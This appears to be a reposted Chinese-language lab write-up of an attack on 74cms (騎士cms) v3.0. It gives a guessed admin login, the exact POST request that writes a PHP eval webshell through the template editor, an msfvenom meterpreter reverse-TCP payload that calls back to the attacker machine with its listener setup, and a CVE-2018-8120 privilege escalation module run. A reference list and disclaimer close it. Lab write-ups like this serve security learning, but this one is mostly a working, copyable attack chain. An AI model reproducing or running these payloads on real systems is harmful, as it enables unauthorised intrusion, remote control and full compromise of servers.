騎士cms v3.0 后台任意文件寫入 getshell 並提權

測試環境

靶機：http://172.168.83.122/admin/

攻擊機：172.168.30.45

信息收集---掃描web目錄

發現后台管理頁面
信息收集---端口掃描
掃端口好慢先試試弱口令？

試了幾次還真就進來了，本來還想試試注入。。。。

搜索一番后發現模板模塊可以任意寫入文件

構造payload如下

提交地址:
http://172.168.83.122/admin/upload/admin/admin_templates.php?act=do_edit

post提交數據：
tpl_name=shell2.php&tpl_content=<?php @eval($_POST[pwd]);phpinfo();?>

寫入成功，蟻劍給我連
成功getshell

但是權限較低，嘗試提權，創建反彈shell並從蟻劍上傳

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.168.30.45 LPORT=4433 -f exe -o 4433.exe

kali設置監聽並運行反彈shell 成功反彈

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 172.168.30.45
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

搜索已安裝補丁
```
run post/windows/gather/enum_patches
```
看似打了很多補丁，但新的漏洞沒有修補

這里用一個常用的內核提權漏洞cve-2018-8120
```
search cve-2018-8120
use  exploit/windows/local/ms18_8120_win32k_privesc
set session 1
run
```
成功提權

[1] https://blog.csdn.net/qq_42879069/article/details/110859869

[2] https://blog.csdn.net/qq_36374896/article/details/84840160

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 騎士cms < 6.0.48任意文件包含漏洞簡記 phpcms v9.6.0任意文件上傳漏洞任意文件讀取 7、任意文件讀取與下載任意文件下載 Apache ActiveMQ任意文件寫入漏洞（CVE-2016-3088）復現 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析若依（Ruoyi）管理系統后台sql注入+任意文件下載漏洞（CNVD-2021-49104）泛微E-Office V9 任意文件上傳漏洞 ECSHOP v3.0 數據庫字典